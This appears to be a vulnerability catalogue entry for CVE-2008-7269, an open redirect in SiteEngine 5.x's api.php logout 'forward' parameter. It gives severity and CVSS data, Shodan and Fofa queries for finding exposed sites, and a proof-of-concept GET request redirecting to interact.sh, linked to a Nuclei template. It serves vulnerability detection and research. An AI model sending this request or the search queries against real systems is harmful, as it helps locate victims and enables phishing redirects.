| Title | UC Gateway Investment SiteEngine v5.0 - Open Redirect |
|---|---|
| Author | ctflearner |
| Severity | Medium |
| Impact | Attackers can redirect users to malicious sites for phishing or malware distribution. |
| Remediation | Apply the latest patches or updates provided by the vendor to fix the open redirect vulnerability. |
| CVSS Score | 5.8 |
| EPSS Score | 0.04298 |
| CVE ID | CVE-2008-7269 |
| CWE ID | CWE-20 |
| Shodan Query | html:"SiteEngine"http.html:"siteengine" |
| Fofa Query | body="siteengine" |
| Tags | cve cve2008 redirect siteengine boka vuln |
Open redirect vulnerability in api.php in SiteEngine 5.x allows user-assisted remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the forward parameter in a logout action.
GET /api.php?action=logout&forward=http://interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ConnectPC Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2008/CVE-2008-7269.yaml
🦈 Packet Capture: ⬇️ Download cve-2008-7269.pcap
N/AN/A